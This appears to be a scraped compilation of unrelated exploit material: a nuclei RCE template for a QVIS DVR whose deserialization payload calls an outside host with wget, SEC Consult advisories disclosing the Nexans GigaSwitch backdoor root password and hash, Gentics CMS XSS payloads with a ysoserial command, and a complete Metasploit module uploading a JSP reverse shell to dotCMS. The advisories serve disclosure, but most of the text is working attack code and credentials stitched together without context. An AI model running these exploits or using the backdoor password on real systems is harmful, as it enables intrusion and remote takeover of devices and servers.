POST /qvisdvr/index.faces;jsessionid={{token}} HTTP/1.1

Host: {{Hostname}}

Content-Type: application/x-www-form-urlencoded

javax.faces.ViewState={{generate\_java\_gadget("commons-collections3.1", "wget http://{{interactsh-url}}", "base64")}}

extractors:

\- type: regex

name: token

group: 1

internal: true

part: header

regex:

\- "JSESSIONID=(.\*)"

matchers-condition: and

matchers:

\- type: word

part: interactsh\_protocol

words:

\- http

\- type: status

status:

\- 500

# Enhanced by mp on 2022/05/19

CVE-2021-41419: nuclei-templates/qvisdvr-deserialization-rce.yaml at master · projectdiscovery/nuclei-templates

libnx_apl.so on Nexans FTTO GigaSwitch before 6.02N and 7.x before 7.02 implements a Backdoor Account for SSH logins on port 50200 or 50201.

All industrial managed FTTO GigaSwitch series from Nexans S.A. are affected by multiple vulnerabilities resulting from outdated software components embedded in the firmware. Hardcoded password hashes were also found in the firmware. Four known vulnerabilities (CVE-2017-16544, CVE-2015-0235, CVE-2015-7547 and CVE-2015-9261) were verified by emulating the device with the MEDUSA scalable firmware runtime.

**Vendor description**

"_As a global player in the cable industry, Nexans is behind the scenes delivering the innovative services and resilient products that carry thousands  
of watts of energy and terabytes of data per second around the world. Millions of homes, cities, businesses are powered every day by Nexans’ high-quality  
sustainable cabling solutions. We help our customers meet the challenges they face in the fields of energy infrastructure, energy resources, transport,  
buildings, telecom and data, providing them with solutions and services for the most complex cable applications in the most demanding environments._"

Source: https://www.nexans.com/company/What-we-do.html

**Business recommendation**

The vendor provides a patch which should be installed immediately.

SEC Consult recommends to perform a thorough security review of these  products conducted by security professionals to identify and resolve all security issues.

**Vulnerability overview/description****1) Outdated Vulnerable Software Components**

A static scan with the IoT Inspector (ONEKEY) revealed outdated software packages that are used in the devices' firmware. Four of them were verified by using the MEDUSA scalable firmware runtime.

**2) Hardcoded Backdoor User (CVE-2022-32985)**

A hardcoded root user was found in "/etc/passwd". In combination with the invoked dropbear SSH daemon in the libnx\_apl.so library, it can be used on port 50201 and 50200 to login on a system shell.

**Proof of concept****1) Outdated Vulnerable Software Components**

Based on an automated scan with the IoT Inspector (ONEKEY) the following third party software packages were found to be outdated:

    Firmware version 6.02L:
    BusyBox       1.20.2 
    Dropbear SSH  2012.55
    GNU glibc     2.17
    lighttpd      1.4.48
    OpenSSL       1.0.2h

The following CVEs were verified with MEDUSA scalable firmware emulation:

****CVE-2015-9261 (Unzip)****

The crafted ZIP archive "x\_6170921383890712452.bin" was taken from: https://www.openwall.com/lists/oss-security/2015/10/25/3

Execution inside the firmware emulation:

    bash-4.2# unzip x_6170921383890712452.bin 
    Archive:  x_6170921383890712452.bin
      inflating: ]3j½r«IK-%Ix
    do_page_fault(): sending SIGSEGV to unzip for invalid read access from 735ededc
    epc = 0044bb28 in busybox[400000+99000]
    ra  = 0044b968 in busybox[400000+99000]
    Segmentation fault

****CVE-2015-0235 (gethostbyname "GHOST" buffer overflow)****

PoC code was taken from: https://gist.github.com/dweinstein/66e6a088191ac0e8105c

****CVE-2015-7547 (getaddrinfo buffer overflow)****

PoC code was taken from: https://github.com/fjserna/CVE-2015-7547

    -bash-4.4# python /medusa_exploits/cve-2015-7547-poc.py &
    [1] 259
    -bash-4.4# chroot /medusa_rootfs/ bin/bash
    bash-4.2# cd /medusa_exploits/
    bash-4.2# ./cve-2015-7547_glibc_getaddrinfo
    [UDP] Total Data len recv 36
    [UDP] Total Data len recv 36
    Connected with 127.0.0.1:34356
    [TCP] Total Data len recv 76
    [TCP] Request1 len recv 36
    [TCP] Request2 len recv 36
    Segmentation fault

****CVE-2017-16544 (shell autocompletion vulnerability)****

A file with the name "\\ectest\\n\\e\]55;test.txt\\a" was created to trigger the vulnerability.

    # ls "pressing <TAB>"
    test
    ]55;test.txt
    #

**2) Hardcoded Backdoor User (CVE-2022-32985)**

The hardcoded system user, reachable via the dropbear SSH daemon was found due to multiple indications on the system. The undocumented root user itself was contained in the "passwd" file:  

Content of the file "/etc/passwd".

    root:oFQzvQf5qrI56:0:0:root:/home/root:/bin/sh
    [...]

Update: The password for the root user is: !Nexans\_

A suspicious port for the SSH daemon was chosen in the config file of dropbear: 

Content of the file "/etc/init.d/dropbear":

    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    DAEMON=/usr/sbin/dropbear
    NAME=dropbear
    DESC="Dropbear SSH server"
    PIDFILE=/var/run/dropbear.pid
    
    DROPBEAR_PORT="50200 -p 50201"
    [...]

This is invoked from "/usr/lib/libnx\_apl.so.0.0.0", which can be seen in the  following pseudo-code:

    void dropbear_server_init(char param_1)
    
    {
      __pid_t __pid;
      char *pcVar1;
      int aiStack16 [2];
      
      __pid = fork();
      if (__pid == 0) {
        __pid = fork();
        if (__pid != 0) {
                        /* WARNING: Subroutine does not return */
          exit(0);
        }
        if (param_1 == '\0') {
          pcVar1 = "/etc/init.d/dropbear stop";
        }
        else {
          pcVar1 = "/etc/init.d/dropbear start";                               <---
        }
        execl("/bin/sh","sh",&DAT_2cd91564,pcVar1,0);
      }
      else {
        waitpid(__pid,aiStack16,0);
      }
      return;
    }

This function is called if a specific command is issued in the CLI interface:

    [...]
      iVar6 = telnet_cmp_command((char *)(param_3 + 0xf2),"ssh",2);
      if (iVar6 != 0) {
        if (param_2 < 4) {
          netbuf_fwd_sprintf(param_1,"\r\n%%Error: Parameter missing\r\n");
          iVar6 = shared_mem_get_addr(&var_shm);
          iVar7 = shared_mem_get_addr(&var_shm);
          uVar8 = shared_mem_read_u8(&var_shm,iVar7 + 0x161a);
          shared_mem_write_u8(&var_shm,iVar6 + 0x161a,uVar8 & 0xff | 0x10);
          return;
        }
        iVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),"start",1);
        if (iVar6 != 0) {
          dropbear_server_init('\x01');                                        <---
          netbuf_fwd_sprintf(param_1,"Starting dropbear...\r\n");
          return;
        }
        iVar6 = telnet_cmp_command((char *)(param_3 + 0x16b),"stop",1);
        if (iVar6 != 0) {
          dropbear_server_init('\0');                                          <---
          netbuf_fwd_sprintf(param_1,"Stopping dropbear...\r\n");
          return;
        }
        netbuf_fwd_sprintf(param_1,"Uknown dropbear command...\r\n");
        return;
    [...]

The mentioned library is used in the CLI program that is running on the device.

**Vulnerable / tested versions**

The following firmware versions have been tested:

*   Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 6.02L
*   Nexans FTTO GigaSwitch HW Version 5 (all industrial/office switches) / Firmware 5.04M

**Vendor contact timeline**

CVE-2022-32985: Hardcoded Backdoor User and Outdated Software Components in Nexans FTTO GigaSwitch series

An issue was discovered in Gentics CMS before 5.43.1. There is stored XSS in the profile description and in the username.

Gentics CMS is a solution to design and manage a website. The CMS is vulnerable to two vulnerabilities that lead to stored Cross-Site-Scripting (XSS) as well as Remote Code Execution (RCE) via unsafe deserialization of Java objects.

**Vendor description**

_"APA-IT Informations Technologie GmbH offers offers support with a focus on media solutions and IT-outsourcing. As a subsidiary of APA – Austria Press Agency, we are responsible for the IT of the Austrian news agency as well as numerous other media enterprises._

_This expertise and insight into the industry make APA-IT an expert for IT solutions for publishers and media-related companies. Existing systems and tools are constantly developed and tailored to individual customer needs. As such, APA-IT is always available – from conception to operation."_ 

Source: https://www.gentics.com/genticscms/company\_gentics.en.html

**Business recommendation**

The vendor provides a patch which should be installed immediately. 

SEC Consult recommends to perform a thorough security review of these products conducted by security professionals to identify and resolve all security issues. 

**Vulnerability overview/description****1) Multiple Stored Cross-Site Scripting Vulnerabilities (CVE-2022-30982) **

Multiple cross-site scripting vulnerabilities are present in the application. An attacker can store malicious JavaScript code in the username and profile description. The code will execute once an admin user hovers over the attacker's username. Thus, the attacker can execute code in the context of an admin. 

**2) Unsafe Java Deserialization (CVE-2022-30981) **

The Gentics CMS has an import option which will accept ZIP files. The archive includes a Java serialized object that gets deserialized on import. This can lead to code execution on the server. 

A low privileged user might be able to exploit this vulnerability by chaining it together with vulnerability 1). 

**Proof of concept****1) Multiple Stored Cross-Site Scripting Vulnerabilities (CVE-2022-30982) **

To trigger the first XSS, an attacker has to change the profile description to include a payload, e.g. **"<script>alert(document.domain)</script)".** The payload will execute once a user with access to the userlist hovers his mouse over the profile name. The event "onmouseover" will trigger following code: 

    JSI3_comp_list_401__ass( this, 'Properties', '<b>Malicious User Name</b><br> 
    <script>alert(document.domain)</script><br><br>created:<br> 09/20/2002  
    ( Gentics Support)<br>last edited:<br>15:56 (Malicious Username)', '' ); 

The execution of the code leads to following function: 

    function JSI3_comp_list_401__ass( obj, title, text, assTitle ) 
    { 
    JSI3_comp_list_401__assReset(); 
    clearTimeout( JSI3_comp_list_401___ass_timeout ); 
    JSI3_comp_list_401__ass_show_row( obj, title, text, assTitle ); 
    } 

The malicious code, which is contained in the "text" parameter, gets passed through to the next function. There it is added to an HTML element and thus executed in the browser. 

    function JSI3_comp_list_401__ass_show_row( obj, title, text, assTitle ) { 
             if (!JSI3_comp_list_401__ass_show_row_tipsy[obj.id]) { 
                 JSI3_comp_list_401__ass_show_row_tipsy[obj.id] = true; 
                 $(obj).attr('title', '<h6>'+title+'</h6>'+text+((assTitle)?'<br>'+assTitle:'')); 
                 $(obj).tipsy({ 
                         trigger: 'manual', 
                         html: true, 
                         offset: 3, 
                         delayIn: 900, 
                         delayOut: 0, 
                         opacity: 0.85, 
                         gravity: 'nww' 
                  }); 
              } 
              $(obj).tipsy("show"); 
              gcn_active_tipsy = obj; 
    } 

Another XSS vector can be found in the parameters "First Name" and "Last Name". 

By e.g. changing the last name to 'Node" onload="alert(document.domain)',  JavaScript code is added to the profile picture that is loaded in the upper right corner on every page. The following snippet shows the vulnerable line of code: 

    <div id="profil"> 
    <div><img src="?do=11&module=system&img=profile_man.png" title="Admin Node" onload="alert(document.domain)" class="profile_avatar"></div> 

The third XSS is caused by changing the first and last name into JavaScript code without prior encoding. Changing the last name to "Last Name'+eval(alert(document.domain))+'" will cause the following code to be included in the server's response: 

    <script language="JavaScript" type="text/javascript"> 
    var menus = new Array(); 
    var imgs = new Array(); 
    menus['Admin Last Name'+eval(alert(document.domain))+''] = new Array(); 
    menus['Admin Last Name'+eval(alert(document.domain))+'']['layer_pos'] = 1; 
    menus['Admin Last Name'+eval(alert(document.domain))+'']['align'] = 'r';

**2) Unsafe Java Deserialization (CVE-2022-30981) **

First, a malicious ZIP archive needs to be created. The following files will need to be included within this archive: 

    bundlebuild.xml:
    
    <?xml version="1.0" encoding="UTF-8"?>
    <bundlebuild>
            <bundleinfo>
                  <name><![CDATA[test4]]></name>
                  <sourcehost><![CDATA[b1d80757b76c]]></sourcehost>
                  <description><![CDATA[]]></description>
                  <globalid>9d6243ab-a281-11eb-9ae3-0242ac130004</globalid>
                  <globalprefix>D77D</globalprefix>
             </bundleinfo>
             <builds>
                     <build>
                           <builddate>1618996405</builddate>
                           <changelog><![CDATA[test4]]></changelog>
                           <count>0</count>
                     </build>
              </builds>
              <tables>
              </tables>
    </bundlebuild>
    
    containedobjects.xml:
    
    <?xml version="1.0" encoding="UTF-8"?>
    <objects>
    </objects>

The third file has to be named "serializedjava.bin" and contains the actual payload. A demo payload can be generated with following command: 

    $ ysoserial FileUpload1 'write;/tmp;SECTEST' > serializedjava.bin 

Those three files have to be zipped together into an archive, which can be uploaded. 

The import feature is available under Enterprise CMS -> Administration -> Import and Export. Now select New->Import and upload the malicious ZIP archive. 

Wait until the import completed. Now click on "Test succeeded" in the file list. On the new screen select "Start import in background". The payload should create a file called "upload\_<random\_uuid>.tmp" in the folder /tmp. It will contain the string "SECTEST".  

Better deserialization chains could be built to reach more interesting targets. It is very likely, that RCE could be obtained by writing an own deserialization chain. 

**Vulnerable / tested versions**

The following product version has been tested and found to be vulnerable. Other versions are vulnerable as well, please see the vendor's changelog in the solution section. 

*   Gentics CMS 5.36.29

**Vendor contact timeline**

CVE-2022-30982: Multiple vulnerabilies in Gentics CMS

An issue was discovered in the ContentResource API in dotCMS 3.0 through 22.02. Attackers can craft a multipart form request to post a file whose filename is not initially sanitized. This allows directory traversal, in which the file is saved outside of the intended storage location. If anonymous content creation is enabled, this allows an unauthenticated attacker to upload an executable file, such as a .jsp file, that can lead to remote code execution.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'DotCMS RCE via Arbitrary File Upload.',        'Description' => %q{          When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the          file down in a temp directory.  In the case of this vulnerability, dotCMS does not sanitize the filename          passed in via the multipart request header and thus does not sanitize the temp file's name.  This allows a          specially crafted request to POST files to dotCMS via the ContentResource (POST /api/content)  that get          written outside of the dotCMS temp directory.  In the case of this exploit, an attacker can upload a special          .jsp file to the webapp/ROOT directory of dotCMS which can allow for remote code execution.        },        'Author' => [          'Shubham Shah',  # Discovery and analysis          'Hussein Daher', # Discovery and analysis          'jheysel-r7'     # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2022-26352'],          ['URL', 'https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/']        ],        'Privileged' => false,        'Platform' => %w[linux win],        'Targets' => [          [            'Java Linux',            {              'Arch' => ARCH_JAVA,              'Platform' => 'linux'            }          ],          [            'Java Windows',            {              'Arch' => ARCH_JAVA,              'Platform' => 'win'            }          ]        ],        'DisclosureDate' => '2022-05-03',        'DefaultTarget' => 0,        'DefaultOptions' => {          'SSL' => true,          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options([      Opt::RPORT(8443),      OptString.new('TARGETURI', [true, 'Base path', '/'])    ])  end  def check    test_content = Rex::Text.rand_text_alpha(10)    test_file = "#{test_content}.jsp"    test_path = "../../#{test_file}"    uuid = Faker::Internet.uuid    jsp = <<~EOS      <%@ page import=\"java.io.File\" %>      <%        File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + "#{test_file}");        jsp.delete();      %>      #{uuid}    EOS    vars_form_data = [      {        'name' => 'name',        'data' => jsp,        'encoding' => nil,        'filename' => test_path,        'mime_type' => 'text/plain'      }    ]    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/api/content/'),      'vars_form_data' => vars_form_data    )    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, test_file.to_s)    )    if res && res.body.include?(uuid)      return Exploit::CheckCode::Vulnerable    end    Exploit::CheckCode::Safe  end  def write_jsp_payload    jsp_path = "../../#{jsp_filename}"    print_status('Writing JSP payload')    vars_form_data = [      {        'name' => 'name',        'data' => payload.encoded,        'encoding' => nil,        'filename' => jsp_path,        'mime_type' => 'text/plain'      }    ]    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/api/content/'),      'vars_form_data' => vars_form_data    )    unless res&.code == 500      fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')    end    register_file_for_cleanup("../webapps/ROOT/#{jsp_filename}")    print_good('Successfully wrote JSP payload')  end  def execute_jsp_payload    jsp_uri = normalize_uri(target_uri.path, jsp_filename)    print_status('Executing JSP payload')    res = send_request_cgi(      'method' => 'GET',      'uri' => jsp_uri    )    unless res&.code == 200      fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')    end    print_good('Successfully executed JSP payload')  end  def exploit    write_jsp_payload    execute_jsp_payload  end  def jsp_filename    @jsp_filename ||= "#{rand_text_alphanumeric(8..16)}.jsp"  endend

Tag

#js